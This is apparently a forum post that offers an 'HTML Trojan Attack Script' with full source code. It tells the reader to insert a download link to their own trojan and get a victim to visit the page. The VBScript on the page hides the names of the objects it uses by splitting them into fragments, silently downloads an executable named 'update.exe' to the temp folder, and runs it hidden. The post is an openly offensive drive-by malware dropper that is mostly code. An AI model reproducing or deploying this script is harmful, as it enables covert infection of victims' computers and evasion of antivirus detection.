Topic: HTML Trojan Attack Script with Source Code

HTML Trojan Attack Script

    1 : Edit [Register or log in to view the URL] to a Direct download link to your trojan.
    2 : Make your victim visit the website , Nothing will popup [no java popup's] it will do the job in the background.
    3 : NOTE:: Maybe there Anti-Virus'es Firewall will detect this but it depends how good the Anti-Virus is.

    HTML Code:

    <HTML>
    <BODY>
    <script language="VBScript">
    on error resume next
    dl = "[Register or log in to view the URL]"
    Set df = document.createElement("object")
    cls1="clsid:BD96"
    cls2="C556-65A"
    cls3="3-11D0-9"
    cls4="83A-00C04FC29E36"
    clsfull=cls1&cls2&cls3&cls4
    df.setAttribute "classid",clsfull
    strr1="Mic"
    strr2="roso"
    strr3="ft."
    strr4="XML"
    strr5="HTTP"
    strr=strr1&strr2&strr3&strr4&strr5
    Set x = df.CreateObject(strr,"")
    ab1="A"
    ab2="dod"
    ab3="b.S"
    ab4="t"
    ab5="re"
    ab6="am"
    strb1=ab1&ab2&ab3&ab4&ab5&ab6
    strb5=strb1
    set YY = df.createobject(strb5,"")
    YY.type = 1
    str6="GET"
    x.Open str6, dl, False
    x.Send
    fnamezz1="update.exe"
    scripp1="Scrip"
    scripp2="ting"
    scripp3=".Fil"
    scripp4="eSyste"
    scripp5="mObject"
    scripp=scripp1&scripp2&scripp3&scripp4&scripp5
    set FF = df.createobject(scripp,"")
    set tmp = F.GetSpecialFolder(2)
    fnamezz1= FF.BuildPath(tmp,fnamezz1)
    YY.open
    YY.write x.responseBody
    YY.savetofile fnamezz1,2
    YY.close
    set MM = df.createobject("Shell.Application","")
    MM.ShellExecute fnamezz1,"","","open",0
    </script>
    </BODY>
    </HTML>